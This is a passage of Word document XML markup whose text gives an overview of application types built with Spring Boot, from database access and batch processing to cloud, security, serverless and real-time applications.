        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and other templating engines for rendering dynamic HTML pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D14CB0"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WebSocket Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It also supports WebSocket communication, which can be leveraged for building real-time web applications such as chat applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7377C909" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Database Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55685AF3"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JPA and Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot simplifies the integration with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Persistence API) and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for interacting with relational databases like MySQL, PostgreSQL, Oracle, etc. It can automatically configure data sources, set up entity classes, and even perform database migrations with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Liquibase</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Flyway</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75FFB6"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NoSQL Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot also supports NoSQL databases like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</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Cassandra</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Couchbase</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which makes it easier to set up and connect to these databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF9E05" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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4. Command-line Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDE26E"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LI Apps</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot provides the ability to develop command-line applications with minimal configuration. These applications can run as standalone Java applications without needing a web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A49425"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You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create quick prototypes or applications that require no web interface but might still leverage Spring's dependency injection, data access, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D3FE6C" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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5. Batch Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D44ACE"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ring Batch</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot is frequently used for creating batch processing applications that involve jobs like file processing, data transformation, scheduled jobs, and bulk data management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664684F2"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ring Batch Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot provides built-in integration with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Batch</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for handling large volumes of data processing, like reading from files, transforming data, and storing it in databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A671606" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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6. Integration and Messaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4C36A"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ring Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot simplifies the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building messaging-based systems, where you can integrate various systems using channels, adapters, and transformers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A898E2D"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Messaging Queues</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot makes it easier to interact with message brokers like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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Kafka</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ActiveMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for asynchronous messaging and event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2037ED" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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7. Cloud Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E684B"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ring Boot + Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot is a core technology for building cloud-native applications, especially with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It supports features like configuration management, service discovery (via </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), distributed tracing, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C40659"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loud Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot applications can be deployed to cloud platforms like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</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Azure</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Google Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heroku</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, thanks to its compatibility with Docker and Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B345CFA" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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8. Security Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF91B9"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ring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot simplifies integration with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle authentication and authorization requirements, such as OAuth2, JWT, LDAP, and more. It's widely used for building secure applications that handle user roles, permissions, and sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E65B2D" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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9. DevOps and CI/CD Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71446F4A"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Spring Boot's </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>production-ready features</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Actuator</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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Health Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, make it ideal for integration with DevOps tools, Continuous Integration/Continuous Deployment (CI/CD) pipelines, monitoring, and logging solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E4E96"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ocker</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot applications can easily be containerized with Docker, allowing for easier deployment and scalability in cloud environments or distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9AF20"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lastRenderedPageBreak/>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot apps are commonly deployed in Kubernetes environments due to their self-contained nature and minimal configuration requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F504847" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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0. IoT (Internet of Things) Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1839D"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 Boot can be used in IoT applications where sensors and devices are connected to a central system. It supports protocols like MQTT for lightweight message communication and can interact with databases and APIs to store and process data from IoT devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D53043C" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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1. Event-Driven Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D668B5"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Spring Boot can be leveraged for </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven systems</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Integration</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Spring Cloud Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where events trigger workflows or other actions within the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BCBC8"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t provides support for asynchronous messaging using queues, topics, and other messaging systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845A462" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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2. Serverless Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BFE637"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Spring Boot is well-suited for creating serverless applications with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS Lambda</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Google Cloud Functions</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Azure Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It allows building event-driven, scalable applications that respond to cloud events and services without worrying about managing infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EFC909" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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3. Testing and Prototyping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78003E40"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nit and Integration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot simplifies writing unit and integration tests with built-in support for tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JUnit</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Mockito</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TestRestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Test</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61113D"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Developers can easily test Spring Boot applications by launching a server or mocking services and repositories, making it a good choice for prototyping and test-driven development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF31E4" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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4. Real-Time Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7789E4C5"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WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With Spring Boot, you can build real-time applications, such as live updates, notifications, and online collaboration tools, using WebSockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A5DF8" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Key Benefits of Using Spring Boot for These Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E93A513"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implified Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot's auto-configuration and embedded web servers (like Tomcat, Jetty, or Undertow) reduce the need for complex setup and configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5130834C"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roduction-Ready</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Built-in support for monitoring, logging, and health checks makes it easy to prepare Spring Boot applications for production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29E80F"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Microservices Support</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
